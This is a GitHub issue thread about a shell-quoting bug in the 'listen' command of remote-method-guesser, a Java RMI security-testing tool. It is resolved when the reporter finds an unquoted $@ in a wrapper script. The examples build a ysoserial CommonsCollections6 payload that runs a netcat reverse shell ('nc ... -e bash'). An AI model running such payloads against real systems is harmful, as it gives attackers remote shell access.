### ISSUE TITLE
listen cmd issues with space

### ISSUE THREAD

**Issue by dogasantos** [qtc-de/remote-method-guesser#29]
hey there,
thanks for this tool, first of all.

It seems that it has a bug with the listen option when using command with spaces:
```
mg listen 192.168.23.12 6535 CommonsCollections6 'nc 192.168.23.11  6536 -e bash'
usage: remote-method-guesser listen [-h] [--config path] [--verbose] [--plugin path] [--no-color] [--stack-trace] [--yso yso-path] ip port gadget cmd
remote-method-guesser: error: unrecognized arguments: '192.168.23.11  6536 -e bash'
```

By using the oldschool ${IFS} as a space, it seems to work with rmg, but not sure if the delivered cmd will contain the spaces.
version: rmg-4.2.2-jar-with-dependencies.jar

Best,
Douglas

**Comment by qtc-de** [comment]
Hi Douglas,

I'm sorry, but I cannot reproduce your issue. For me, everything works like expected:

```console
$ rmg listen 172.17.0.1 6535 CommonsCollections6 'nc 172.17.0.1 6536 -e sh'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 172.17.0.1:6535.
[+] Handing off to ysoserial...
```

The underlying problem of your error seems to be that your single quotes are not recognized. Therefore, `'nc'' is treated as the command and the rest of your string is interpreted as additional arguments. So my best guess is that there is a problem with the single quote handling of the shell that you are using? What kind of OS do you use and in which shell you have observed the error above?

Since remote-method-guesser parses arguments using [argparse4j](https://github.com/argparse4j/argparse4j) we would need to open up a issue there if your problem is reproducible. However, like mentioned above, I expect the problem to be related to your shell. Have you already tried to run the command with double quotes? Probably this already helps :)

Best
Tobias

**Comment by dogasantos** [comment]
Hey Tobias,
thanks for the  response.
Yes, the problem was on my side of things:
```
root@ubuntuhack:~# whereis rmg
rmg: /usr/bin/rmg  
root@ubuntuhack:~# cat /usr/bin/rmg
#!/bin/bash
java -jar /usr/share/remote-method-guesser/target/rmg-4.2.2-jar-with-dependencies.jar $@
root@ubuntuhack:~#
```
This will break the ' argument in this case

By calling the jar directly, the problem is gone.
My bad, sorry for that.

Thanks!!
